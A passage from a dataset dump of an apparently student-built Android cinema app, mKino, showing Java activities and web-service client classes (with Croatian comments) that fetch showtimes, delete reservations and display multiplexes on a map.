ArrayAdapter<String> adapter = new ArrayAdapter<String>(this,\r\n\t\t android.R.layout.simple_spinner_item, dani);\r\n\r\n\t\t \r\n\t\t odabirDatuma.setAdapter(adapter);\r\n\t\t odabirDatuma.setSelection(0);\r\n\t\t \r\n\t\t //računamo koji je datum u spinneru s datumom\r\n\t\t sadasnjiDatum = new Date();\r\n\t\t odabirDatuma.setOnItemSelectedListener(new OnItemSelectedListener() {\r\n\t\t \t@Override\r\n\t\t\t\tpublic void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long indeksDana) {\t\t\t\t\t\t\t\t\t\t\r\n\t\t \t\tDate sadasnjiDatum = new Date();\r\n\t\t \t\t\r\n\t\t \t\tsadasnjiDatum = Rezervacija.dodajDan(sadasnjiDatum,(int)indeksDana);\t\t \t\t\r\n\t\t \t\t SimpleDateFormat formatDatuma2 = new SimpleDateFormat(\"yyyy-MM-dd\");\r\n\t\t \t\t \r\n\t\t \t\t //učitavamo datume u listview\r\n\t\t \t\tucitajProjekcijeUListView(formatDatuma2.format(sadasnjiDatum));\t\t \t\t\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onNothingSelected(AdapterView<?> arg0) {}\t\t \r\n\t\t \r\n\t\t });\r\n\t\t \r\n\t\t //prilikom odabira grada mijenja se prikaz projekcija za odabrani grad\r\n\t\t odabirGrada.setOnItemSelectedListener(new OnItemSelectedListener() {\r\n\t\t \t@Override\r\n\t\t\t\tpublic void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long idOdabranogMultipleksa) {\t\t\t\t\t\t\t\t\t\t\r\n\r\n\t\t \t\t//ponovno zahtjevamo projekcije za odabrani grad\r\n\t\t \t\tprojekcije = dohvatiProjekcije((int)idOdabranogMultipleksa+1);\t\r\n\t\t \t\t\r\n\t\t \t\tDate sadasnjiDatum = new Date();\r\n\t\t \t\tsadasnjiDatum = Rezervacija.dodajDan(sadasnjiDatum,(int)odabirDatuma.getSelectedItemPosition());\r\n\t\t \t\tSimpleDateFormat formatDatuma2 = new SimpleDateFormat(\"yyyy-MM-dd\");\r\n\t\t \t\t//učitavamo datume u listview\r\n\t\t \t\tucitajProjekcijeUListView(formatDatuma2.format(sadasnjiDatum));\r\n\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onNothingSelected(AdapterView<?> arg0) {}\r\n\t\t\t});\r\n\t\t \r\n\t\t// postavljamo listener na ListView s projekcijama\r\n\t\tpopisProjekcija.setOnItemClickListener(new OnItemClickListener() {\r\n\t\t\t@Override\r\n\t\t\tpublic void onItemClick(AdapterView<?> arg0, View kliknutaProjekcija, int pozicijaKliknuteProjekcije, long idKli) {\r\n\t\t\t\tTextView tv = (TextView) kliknutaProjekcija.findViewById(R.id.id_projekcije_u_bazi);\r\n\t\t\t\tint idProjekcijeUBazi = Integer.parseInt(tv.getText().toString());\r\n\t\t\t\t\r\n\t\t\t\t//prilikom kilika otvaraju se detalji o projekciji\r\n\t\t\t\tIntent i = new Intent(ProjekcijeActivity.this, DetaljiProjekcijeActivity.class);\r\n\t\t\t\ti.putExtra(\"idProjekcijeUBazi\", idProjekcijeUBazi);\r\n\t\t\t\tstartActivity(i);\r\n\t\t\t}\r\n\t\t});\r\n\t\t\r\n\t\t// dohvaćamo filmove i pohranjujemo ih u ListView \"popisFilmova\". 
Tu se automatski prikazuju na zaslon\r\n\t\tprojekcije = dohvatiProjekcije(odabraniMultipleks);\r\n\t\tSimpleDateFormat formatDatuma2 = new SimpleDateFormat(\"yyyy-MM-dd\");\r\n\t\tucitajProjekcijeUListView(formatDatuma2.format(sadasnjiDatum));\r\n\t\r\n\t}\r\n\t\t\r\n\t\r\n\t/**Postavlja spinner za izbor multipleksa na vrijednost trenutnog multipleksa u bazi.\r\n\t * Ukoliko on ne postoji ondje, odabire se prvi multipleks (indeks 0) koji je Zagreb\r\n\t */\r\n\tprivate int dohvatiOdabraniMultipleks() {\r\n\t\tfinal int ZAGREB = 1;\r\n\t\tint odabraniMultipleks = 1;//oma.dohvatiOdabraniMultipleks();\r\n\t\t\r\n\t\tif (odabraniMultipleks >= 1)\r\n\t\t\treturn odabraniMultipleks;\r\n\t\telse\r\n\t\t\treturn ZAGREB;\r\n\t}\r\n\t\r\n\t/**Dohvaća projekcije.\r\n\t * \r\n\t * Ova metoda pokreće dohvaćanje projekcije na dva načina. Prvo se dohvaćaju iz baze indeksi svih projekcija.\r\n\t * Potom se oblikuju u JSON i šalje se zahtjev web servisu. Servis vraća samo one projekcije \r\n\t * kojih nema u lokalnoj bazi, kao i one koje treba ukloniti iz lokalne baze.\r\n\t * Nakon toga se projekcije prikazuju na zaslon.\r\n\t * Ovaj princip je odabran kako bi se korisnicima uštedio podatkovni promet, odnosno,\r\n\t * kako se ne bi uvijek dohvaćali svi filmovi sa servisa\r\n\t * \r\n\t * @param id multipleksa\r\n\t * @return ažurirane projekcije\r\n\t */\r\n\tprivate List<ProjekcijaInfo> dohvatiProjekcije(int multipleks)\r\n\t{\t\r\n\t\tJsonProjekcije jf = new JsonProjekcije();\r\n\t\t\r\n\t\tList<ProjekcijaInfo> pinf = jf.dohvatiProjekcije(this, multipleks);\t\t\r\n\t\treturn pinf;\r\n\t}\r\n\r\n\r\n\t/** Dohvaća projekcije i učitava ih u ListView.\r\n\t * @params datum projekcija\r\n\t */\r\n\tprivate void ucitajProjekcijeUListView(String datum)\r\n\t{\r\n\t\tList<ProjekcijaInfo> danasnjeProjekcije = filtrirajProjekcijeZaDatum(datum);\r\n\t\tArrayAdapter<ProjekcijaInfo> adapter = new StavkaProjekcije(this, R.layout.stavka_projekcije, danasnjeProjekcije);\r\n\t\tListView lv = (ListView) findViewById(R.id.rezervacije_popis_projekcija);\r\n\t\tlv.setAdapter(adapter);\r\n\t}\r\n\t\r\n\t\r\n\t/**Filtiranje projekcija za odabrani datum.\r\n\t * Iz popisa svih projekcija filtrira samo današnje projekcije.\r\n\t * S ovim sprječavamo nova dohvaćanja projekcija kada se promijeni datum prikazivanja projekcija\r\n\t * @param odabrani datum\r\n\t * @return lista današnjih projekcija\r\n\t */\r\n\tprivate List<ProjekcijaInfo> filtrirajProjekcijeZaDatum(String datum) {\r\n\t\tList<ProjekcijaInfo> danasnjeProjekcije = new ArrayList<ProjekcijaInfo>();\r\n\t\t\r\n\t\t//prolazimo kroz sve projekcije i provjeravamo dan, mjesec i godinu početka\r\n\t\tfor(ProjekcijaInfo projekcija : projekcije)\r\n\t\t{\r\n\t\t\tif (datum.equals(projekcija.getVrijemePocetka().substring(0, 10)))\r\n\t\t\t{\r\n\t\t\t\tdanasnjeProjekcije.add(projekcija);\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\treturn danasnjeProjekcije;\r\n\t}\r\n\t/**\r\n\t * Metoda koja vraća dan u tjednu.\r\n\t * @param datum\r\n\t * @return string dan u tjednu\r\n\t */\r\n\t public String vratiDanUTjednu(Date datum)\r\n\t { \r\n\t\t String danOriginal;\r\n\t\t SimpleDateFormat formatDana = new SimpleDateFormat(\"E\");\r\n\r\n\t\t //dohvaćame dane u tjednu iz resursa\r\n\t\t String[] daniUTjednu = getResources().getStringArray(R.array.dani_u_tjednu);\r\n\t\t \r\n\t\t danOriginal = formatDana.format(datum);\r\n\t\t \r\n\t\t if(danOriginal.compareTo(\"Mon\") == 0 ) return daniUTjednu[0];\r\n\t\t else if(danOriginal.compareTo(\"Tue\") == 0 ) return daniUTjednu[1];\r\n\t\t else 
if(danOriginal.compareTo(\"Wed\") == 0 ) return daniUTjednu[2];\r\n\t\t else if(danOriginal.compareTo(\"Thu\") == 0 ) return daniUTjednu[3];\r\n\t\t else if(danOriginal.compareTo(\"Fri\") == 0 ) return daniUTjednu[4];\r\n\t\t else if(danOriginal.compareTo(\"Sat\") == 0 ) return daniUTjednu[5];\r\n\t\t else if(danOriginal.compareTo(\"Sun\") == 0 ) return daniUTjednu[6];\r\n\t\t else return danOriginal.toString();\r\n\t\t\r\n\t }\r\n}\r\n" }, { "alpha_fraction": 0.8300395011901855, "alphanum_fraction": 0.8300395011901855, "avg_line_length": 49.599998474121094, "blob_id": "9a90d3235ec82a2266b05825d08118ae9667c15a", "content_id": "183d9b598de4f159fa53ba4b22f6a8ee743a5cc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 258, "license_type": "no_license", "max_line_length": 114, "num_lines": 5, "path": "/README.md", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "#Klijentska strana\nMapa client-side predstavlja mobilnu aplikaciju koja će se izvršavati na Android uređaju (klijentu)\n\n#Serverska strana\nMapa server-side predstavlja skup PHP skripti, bazu podataka i ostale materijale, koji će se izrvšavati na serveru\n" }, { "alpha_fraction": 0.72089684009552, "alphanum_fraction": 0.7221524715423584, "avg_line_length": 30.9881649017334, "blob_id": "3b3712789a7028a72122227d15d1b1ac1a212e92", "content_id": "a53b6de6a4782b1a38bc99441569e32c159e7cbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5595, "license_type": "no_license", "max_line_length": 219, "num_lines": 169, "path": "/client-side/src/hr/air/mkino/server/JsonProjekcije.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport hr.air.mkino.baza.FilmoviAdapter;\r\n\r\nimport hr.air.mkino.baza.ProjekcijeAdapter;\r\nimport hr.air.mkino.tipovi.FilmInfo;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\n\r\nimport java.io.IOException;\r\nimport java.io.UnsupportedEncodingException;\r\nimport java.util.ArrayList;\r\n\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.NameValuePair;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.entity.UrlEncodedFormEntity;\r\nimport org.apache.http.client.methods.HttpPost;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.apache.http.message.BasicNameValuePair;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport android.content.Context;\r\nimport android.os.AsyncTask;\r\n\r\n/**\r\n * Klasa koja služi z aasinkrono dohvaćanje projekcija sa web servisa.\r\n * @author bstivic\r\n *\r\n */\r\npublic class JsonProjekcije extends AsyncTask <String, Void, String> {\r\n\r\nProjekcijeAdapter bazaProjekcija;\r\n\t\r\n\t/**\r\n\t * Dohvaća projekcije sa web servisa. 
To ne uključuje one projekcije koji se već nalaze u lokalnoj bazi\r\n\t * @return projekcije u Jsonformatu\r\n\t */\r\n\tpublic List<ProjekcijaInfo> dohvatiProjekcije(Context c, int multipleks)\r\n\t{\r\n\t\t// najprije dohvaćamo id-eve projekcija iz lokalne baze podataka, kako bi znali koje projekcije ne trebamo dohvaćati sa webservisa\r\n\t\tbazaProjekcija = new ProjekcijeAdapter(c);\r\n\t\tList<Integer> idProjekcija = bazaProjekcija.dohvatiIdProjekcija();\r\n\t\t\r\n\t\t// pretvaramo listu s id-evima projekcija u JSON string \r\n\t\tStringBuilder sb = new StringBuilder();\r\n\t\tsb.append(\"[\");\r\n\t\tfor(int i=0; i<idProjekcija.size(); i++)\r\n\t\t{\r\n\t\t\tsb.append(\"{\\\"idProjekcije\\\":\\\"\" + idProjekcija.get(i) + \"\\\"}\");\r\n\t\t\t// ako se ne radi o posljednjem elementu, dodat ćemo zarez\r\n\t\t\tif (i != idProjekcija.size() - 1)\r\n\t\t\t{\r\n\t\t\t\tsb.append(\",\");\r\n\t\t\t}\r\n\t\t}\r\n\t\tsb.append(\"]\");\r\n\t\t// finalni JSON string koji ćemo slati web servisu putem HTTP-POST metode\r\n\t\tString jsonString = sb.toString();\r\n\t\t\r\n\t\tString mult = Integer.toString(multipleks);\r\n\t\tthis.execute(jsonString,mult);\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\r\n\r\n\t\t\tList<ProjekcijaInfo> projekcije = parsirajJson(jsonRezultat, c, multipleks);\r\n\t\t\treturn projekcije;\r\n\t\t\r\n\t}\r\n\t\r\n\t/**\r\n\t * Parsira JSON string dohvaćen s web servisa \r\n\t * @param jsonRezultat\r\n\t * @return projekcije\r\n\t */\r\n\tprivate List<ProjekcijaInfo> parsirajJson(String jsonRezultat, Context c, int multipleksOdabrani) {\r\n\t\tList<ProjekcijaInfo> projekcije\t= new ArrayList<ProjekcijaInfo>();\r\n\t\tFilmoviAdapter filmAd = new FilmoviAdapter(c);\r\n\t\tint film;\r\n\t\tint dvorana;\r\n\t\tString vrijemePocetka;\r\n\t\tfloat cijena;\t\t\r\n\t\tint multipleks;\t\r\n\t\tint idProjekcije;\r\n\t\t\r\n\t\ttry {\r\n\t\t\tJSONArray projekcijeJson = new JSONArray(jsonRezultat);\r\n\t\t\tint n = projekcijeJson.length();\r\n\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t{\r\n\t\t\t\tJSONObject projekcijaJson = projekcijeJson.getJSONObject(i);\r\n\t\t\t\tfilm = projekcijaJson.getInt(\"film\");\r\n\t\t\t\tdvorana = projekcijaJson.getInt(\"brojDvorane\");\r\n\t\t\t\tvrijemePocetka = projekcijaJson.getString(\"vrijemePocetka\");\r\n\t\t\t\tcijena = (float)projekcijaJson.getDouble(\"cijena\");\r\n\t\t\t\tidProjekcije = projekcijaJson.getInt(\"idProjekcije\");\r\n\t\t\t\tmultipleks = projekcijaJson.getInt(\"multipleks\");\r\n\t\t\t\tFilmInfo filmInf = filmAd.dohvatiDetaljeFilma(film);\t\r\n\r\n\t\t\t\tProjekcijaInfo projekcija = new ProjekcijaInfo(idProjekcije, dvorana, filmInf,vrijemePocetka, multipleks, cijena); \t\r\n\t\t\t\t\r\n\t\t\t\tprojekcije.add(projekcija);\r\n\t\t\t}\r\n\t\t}\r\n\t\tcatch (JSONException e) {\r\n\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\r\n\t\t\r\n\t bazaProjekcija.azurirajBazuProjekcija(projekcije);\r\n\r\n\t\t// nakon ažuriranja baze, dohvaćamo ponovno sve filmove iz baze\r\n\t\tprojekcije = bazaProjekcija.dohvatiProjekcije(multipleksOdabrani, c);\r\n\t\t\r\n\t\treturn projekcije;\r\n\t}\r\n\t\r\n\t// pomoćna metoda koja u pozadini obrađuje http zahtjev (dohvaćanje podataka)\r\n\t@Override\r\n\tprotected String doInBackground(String... 
parametri) {\r\n\t\tString jsonString = parametri[0];\r\n\t\tString multipleks = parametri[1];\r\n\t\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\t// HTTP-POST metodom ćemo poslati JSON string. U tom JSON stringu se nalaze indeksi svih projekcija koji se nalaze u lokalnoj bazi. Web servis će vratiti sve one projekcije čiji se indeksi ne nalaze u tom JSON stringu\r\n\t\tHttpPost httpPost = new HttpPost(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=projekcijeMultipleks&multipleks=\"+multipleks);\r\n\t\t\r\n\t\t// dodajemo JSON string u \"httpPost\" objekt\r\n\t\ttry {\r\n\t\t\tList<NameValuePair> podaci = new ArrayList<NameValuePair>();\r\n\t\t\tpodaci.add(new BasicNameValuePair(\"bezOvihProjekcija\", jsonString));\r\n\t\t\thttpPost.setEntity(new UrlEncodedFormEntity(podaci));\r\n\t\t} catch (UnsupportedEncodingException e1) {\r\n\t\t\te1.printStackTrace();\r\n\t\t}\r\n\r\n\t\tString jsonRezultat = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\r\n\t\t// ono što dohvatimo u jsonRezultat će biti odgovor servera (web servisa)\r\n\t\ttry {\r\n\t\t\tjsonRezultat = httpKlijent.execute(httpPost, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\treturn jsonRezultat;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7113272547721863, "alphanum_fraction": 0.7138374447822571, "avg_line_length": 26.45535659790039, "blob_id": "359f10c83ef0183b231600f111cf3df6ac248b7a", "content_id": "70240173da1b06e9dd19336ee9199fe2438c5911", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3190, "license_type": "no_license", "max_line_length": 114, "num_lines": 112, "path": "/client-side/src/hr/air/mkino/server/JsonObrisiRegistraciju.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.NameValuePair;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.entity.UrlEncodedFormEntity;\r\nimport org.apache.http.client.methods.HttpPost;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.apache.http.message.BasicNameValuePair;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\n\r\nimport android.content.Context;\r\nimport android.os.AsyncTask;\r\n/**\r\n * Klasa koja služi za brisanje rezervacije na udaljenoj bazi podataka.\r\n * @author bstivic\r\n *\r\n */\r\npublic class JsonObrisiRegistraciju extends AsyncTask<String, Void, String> {\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za brisanje rezervacije.\r\n\t * komunicira sa web servisom\r\n\t * @param korisnickoIme\r\n\t * @param idProjekcije\r\n\t * @param context\r\n\t * @return uspjesnost 0-uspjesno, - neuspjesno\r\n\t */\r\n\tpublic int dohvati(String korisnickoIme, String idProjekcije, Context c)\r\n\t{\t\t\t\t\t\r\n\t\tthis.execute(korisnickoIme, idProjekcije);\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) 
{\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn parsirajJson(jsonRezultat);\t\t\t\r\n\t}\r\n\r\n/**\r\n * Metoda koja parsira rezultat web servisa.\r\n * @param jsonRezultat\r\n * @return 0 uspjesno, <0 neuspjesno\r\n */\r\n\tprivate int parsirajJson(String jsonRezultat) {\t\t\r\n\t\tint povratnaInformacijaId = 7;\r\n\t\t\r\n\t\ttry {\r\n\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\tint n = rezultati.length();\r\n\t\t\t\r\n\t\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t\t{\r\n\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\t\t\t\t\r\n\t\t\t\tpovratnaInformacijaId = rezultat.getInt(\"povratnaInformacijaId\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\r\n\t\tcatch (JSONException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t\treturn -7;\r\n\t\t}\r\n\t\t\r\n\t\treturn povratnaInformacijaId;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za asinkronu komunikaciju sa web servisom.\r\n\t */\r\n\tprotected String doInBackground(String... podaciPrijava) {\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t \r\n\t\tHttpPost httpPostZahtjev = new HttpPost(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=obrisirezervaciju\");\r\n\t\tString jsonResult = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\t\t\t\r\n\t\tList<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>();\r\n\t\tnameValuePairs.add(new BasicNameValuePair(\"korisnickoime\", podaciPrijava[0]));\r\n\t\tnameValuePairs.add(new BasicNameValuePair(\"projekcija\", podaciPrijava[1]));\r\n\r\n\t\ttry {\r\n\t\t\t httpPostZahtjev.setEntity(new UrlEncodedFormEntity(nameValuePairs));\r\n\t\t\t jsonResult = httpKlijent.execute(httpPostZahtjev, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\treturn jsonResult;\r\n\t}\r\n\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7414926290512085, "alphanum_fraction": 0.7454359531402588, "avg_line_length": 34.036842346191406, "blob_id": "0bb34997366c29875ff5e8b2a614f383ad8ac950", "content_id": "e2bce0726a600387f9e09973304285bc11d108e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6875, "license_type": "no_license", "max_line_length": 173, "num_lines": 190, "path": "/client-side/src/hr/air/mkino/MojaMapaActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\nimport java.util.List;\r\n\r\nimport com.google.android.gms.maps.CameraUpdate;\r\nimport com.google.android.gms.maps.CameraUpdateFactory;\r\nimport com.google.android.gms.maps.GoogleMap;\r\nimport com.google.android.gms.maps.SupportMapFragment;\r\nimport com.google.android.gms.maps.model.BitmapDescriptorFactory;\r\nimport com.google.android.gms.maps.model.CameraPosition;\r\nimport com.google.android.gms.maps.model.LatLng;\r\nimport com.google.android.gms.maps.model.MarkerOptions;\r\n\r\nimport hr.air.mkino.R;\r\nimport hr.air.mkino.baza.MultipleksAdapter;\r\nimport hr.air.mkino.baza.OdabraniMultipleksAdapter;\r\nimport hr.air.mkino.lokacija.PratiteljLokacije;\r\nimport hr.air.mkino.server.JsonMultipleksi;\r\nimport hr.air.mkino.tipovi.MultipleksInfo;\r\nimport android.os.Bundle;\r\nimport android.support.v4.app.FragmentActivity;\r\nimport android.view.Menu;\r\nimport android.view.MenuItem;\r\nimport 
android.view.View;\r\nimport android.widget.AdapterView;\r\nimport android.widget.AdapterView.OnItemSelectedListener;\r\nimport android.widget.Spinner;\r\n\r\n/**\r\n * Ova klasa služi za prikaz multipleksa i odabir istog. \r\n * Odabrani multipleks će se pohraniti u lokalnoj bazi i biti će korišten svaki puta kada to bude bilo potrebno u aplikaciji\r\n * @author domagoj\r\n */\r\npublic class MojaMapaActivity extends FragmentActivity {\r\n\tprivate GoogleMap mapa;\r\n\tprivate Spinner spinner;\r\n\tprivate List<MultipleksInfo> multipleksi;\r\n\tprivate OdabraniMultipleksAdapter odabraniMultipleks;\r\n\t\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_moja_mapa);\r\n\t\tsetTitle(\"Prikaz multipleksa\");\r\n\t\t\r\n\t\tmapa = ((SupportMapFragment) getSupportFragmentManager().findFragmentById(R.id.map_fragment)).getMap();\r\n\t\tspinner = (Spinner) findViewById(R.id.odabir_multipleksa);\r\n\t\tmultipleksi = dohvatiMultiplekse();\r\n\t\t\r\n\t\todabraniMultipleks = new OdabraniMultipleksAdapter(this);\r\n\t\t// postavljamo spinner na vrijednost iz baze podataka\r\n\t\tpostaviSpinner(odabraniMultipleks);\r\n\t\t\r\n\t\t// omogućujemo da se svaka promjena spinnera prikaže na karti i također odmah prikazujemo multiplekse na karti\r\n\t\tspinner.setOnItemSelectedListener(new OnItemSelectedListener() {\r\n\t\t\t@Override\r\n\t\t\tpublic void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long idOdabranogMultipleksa) {\r\n\t\t\t\tprikaziMultipleksaNaKarti(multipleksi);\r\n\t\t\t\t\r\n\t\t\t\t// pohranjujemo vrijednost spinnera u bazu podataka\r\n\t\t\t\todabraniMultipleks.pohraniOdabraniMultipleks((int)idOdabranogMultipleksa);\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t@Override\r\n\t\t\tpublic void onNothingSelected(AdapterView<?> arg0) {}\r\n\t\t});\r\n\t\t\r\n\t\t\r\n\t}\r\n\r\n\t@Override\r\n\tpublic boolean onCreateOptionsMenu(Menu menu) {\r\n\t\t// Inflate the menu; this adds items to the action bar if it is present.\r\n\t\tgetMenuInflater().inflate(R.menu.moja_mapa_activity, menu);\r\n\t\treturn true;\r\n\t}\r\n\t@Override\r\n\tpublic boolean onOptionsItemSelected(MenuItem item) {\r\n\t\tswitch (item.getItemId()) {\r\n\t\tcase R.id.geolokacija:\r\n\t\t\t\t// brišemo postojeći multipleks iz baze i postavljamo novi (koji će biti dobiven geolokacijom)\r\n\t\t\t\todabraniMultipleks.obrisiMultiplekseIzBaze();\r\n\t\t\t\tpostaviSpinner(odabraniMultipleks);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\treturn super.onOptionsItemSelected(item);\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća multiplekse. \r\n\t * Ukoliko postoje u lokalnoj bazi, dohvaća ih iz nje, a ukoliko ne, dohvaća ih sa servisa. 
To je učinjeno u svrhu štednje podatkovnog prometa\r\n\t * @return lista s dohvaćenim multipleksima\r\n\t */\r\n\tprivate List<MultipleksInfo> dohvatiMultiplekse() {\r\n\t\tMultipleksAdapter multipleksAdapter = new MultipleksAdapter(this);\r\n\t\tList<MultipleksInfo> multipleksi = multipleksAdapter.dohvatiMultiplekse();\r\n\t\t\r\n\t\tif (multipleksi.size() == 0)\r\n\t\t{\r\n\t\t\tJsonMultipleksi jsonMultipleksi = new JsonMultipleksi();\r\n\t\t\tmultipleksi = jsonMultipleksi.dohvatiMultiplekse();\r\n\t\t\t\r\n\t\t\t// unos dohvaćenih multipleksa u lokalnu bazu\r\n\t\t\tfor (MultipleksInfo multipleks : multipleksi)\r\n\t\t\t{\r\n\t\t\t\tmultipleksAdapter.unosMultipleksa(multipleks);\r\n\t\t\t}\r\n\t\t} \r\n\t\t\r\n\t\treturn multipleksi;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Prikazuje multiplekse na karti (prije toga čisti kartu od svih postavljenih multipleksa)\r\n\t * @param multipleksi\r\n\t */\r\n\tprivate void prikaziMultipleksaNaKarti(List<MultipleksInfo> multipleksi) {\r\n\t\tlong idMultipleksaSpinner = spinner.getSelectedItemId();\r\n\t\t\r\n\t\tmapa.clear();\r\n\t\tfor (MultipleksInfo multipleks : multipleksi)\r\n\t\t{\r\n\t\t\tMarkerOptions marker = new MarkerOptions();\r\n\t\t\tmarker.title(multipleks.getNaziv());\r\n\t\t\tmarker.position(new LatLng(multipleks.getZemljopisnaSirina(), multipleks.getZemljopisnaDuzina()));\r\n\t\t\t\r\n\t\t\tif (multipleks.getIdMultipleksa() == idMultipleksaSpinner + 1)\r\n\t\t\t{\r\n\t\t\t\tmarker.icon(BitmapDescriptorFactory.fromResource(R.drawable.kino_selektirano));\r\n\t\t\t\t\r\n\t\t\t\tfloat lat = multipleks.getZemljopisnaSirina();\r\n\t\t\t\tfloat lng = multipleks.getZemljopisnaDuzina();\r\n\t\t\t\tCameraPosition cp = new CameraPosition(new LatLng(lat, lng), 6, 0, 0);\r\n\t\t\t\tCameraUpdate cu = CameraUpdateFactory.newCameraPosition(cp);\r\n\t\t\t\tmapa.animateCamera(cu);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tmarker.icon(BitmapDescriptorFactory.fromResource(R.drawable.kino));\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tmapa.addMarker(marker);\r\n\t\t}\r\n\t}\r\n\t\r\n\t/**\r\n\t * Postavlja početnu vrijednost na spinner za odabir lokacije. Ukoliko taj podatak ne postoji u bazi, postavljamo spinner na index 0 (grad Zagreb)\r\n\t * @param odabraniMultipleks koji će biti postavljen na spinner\r\n\t */\r\n\tprivate void postaviSpinner(OdabraniMultipleksAdapter odabraniMultipleks) {\r\n\t\tint trenutnaVrijednost = odabraniMultipleks.dohvatiOdabraniMultipleks();\r\n\t\t\r\n\t\tif (trenutnaVrijednost == -1)\r\n\t\t\tspinner.setSelection(indeksNajblizegMultipleksa());\r\n\t\telse\r\n\t\t\tspinner.setSelection(trenutnaVrijednost);\r\n\t}\r\n\r\n\t/**\r\n\t * Ova metoda vraća indeks najbližeg multipleksa kako bi se on mogao koristiti u spinner-u. 
